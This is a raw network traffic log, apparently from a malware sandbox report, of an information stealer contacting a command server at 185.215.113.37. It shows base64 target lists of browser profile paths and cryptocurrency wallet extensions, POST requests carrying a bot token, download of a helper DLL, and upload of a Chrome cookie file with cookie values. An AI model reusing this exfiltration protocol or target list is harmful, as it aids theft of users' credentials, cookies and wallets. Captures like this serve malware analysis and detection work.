R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 27, 2024 01:28:13.816545963 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 27, 2024 01:28:13.817775965 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFI Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="message"plugins------DGDBKFBAKFBFHIECFBFI--
Sep 27, 2024 01:28:14.039243937 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:13 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 27, 2024 01:28:14.039264917 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Sep 27, 2024 01:28:14.039283991 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Sep 27, 2024 01:28:14.039299965 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Sep 27, 2024 01:28:14.039311886 CEST	596	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Sep 27, 2024 01:28:14.039516926 CEST	1236	IN	Data Raw: 59 57 39 70 59 32 39 6c 61 6d 39 75 61 57 46 74 62 57 35 68 62 47 74 6d 59 58 77 78 66 44 42 38 4d 48 78 46 59 33 52 76 49 46 64 68 62 47 78 6c 64 48 78 69 5a 32 70 76 5a 33 42 76 61 57 52 6c 61 6d 52 6c 62 57 64 76 62 32 4e 6f 63 47 35 72 62 57 Data Ascii: YW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXw
Sep 27, 2024 01:28:14.039530039 CEST	568	IN	Data Raw: 61 79 42 58 59 57 78 73 5a 58 52 38 59 57 5a 73 61 32 31 6d 61 47 56 69 5a 57 52 69 61 6d 6c 76 61 58 42 6e 62 47 64 6a 59 6d 4e 74 62 6d 4a 77 5a 32 78 70 62 32 5a 38 4d 58 77 77 66 44 42 38 56 47 39 75 61 32 56 6c 63 47 56 79 49 46 64 68 62 47 Data Ascii: ayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJ
Sep 27, 2024 01:28:14.081892014 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDB Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="message"fplugins------CFHCGHJDBFIIDGDHIJDB--
Sep 27, 2024 01:28:14.302524090 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:14 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 27, 2024 01:28:14.320244074 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJD Host: 185.215.113.37 Content-Length: 5895 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 01:28:14.320310116 CEST	5895	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 27, 2024 01:28:15.166891098 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:14 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 01:28:15.440720081 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 27, 2024 01:28:15.883271933 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:15 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 27, 2024 01:28:15.883291006 CEST	124	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Sep 27, 2024 01:28:15.883307934 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2024 01:28:15.887940884 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:15 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 27, 2024 01:28:17.229598999 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGI Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwODEzMDAJMVBfSkFSCTIwMjMtMTAtMDUtMDkKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMzAwNDk5CU5JRAk1MTE9azl0VDNxN1lmaDFueF9GU2wwNkY1VUVfdmRhRlFyZWlHS2UxYUROODNNZXZlRDdQTDFSWlh2YTRzLW5GYzl3YVFpOUx0S2F2dVRJYmE4TVVrb0d1NThFOEU4MWd3Ql9UV0o0TmctTGZDdnpoZW03ck5yaFpRMmFHdkpaOWcyVFlocXgyVzJPNEU3dUhRelBrM3Z1THZNTHhGWFpzcUU2TmRBVmlRREVDR3BvCg==------CGIDAAAKJJDBGCBFCBGI--
Sep 27, 2024 01:28:17.955328941 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:17 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 01:28:18.060935974 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDB Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="file"------CFHCGHJDBFIIDGDHIJDB--
Sep 27, 2024 01:28:18.777635098 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:28:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
